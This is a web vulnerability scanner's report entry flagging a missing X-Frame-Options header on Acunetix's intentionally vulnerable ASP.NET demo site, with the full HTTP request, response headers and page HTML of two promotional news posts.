<div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> 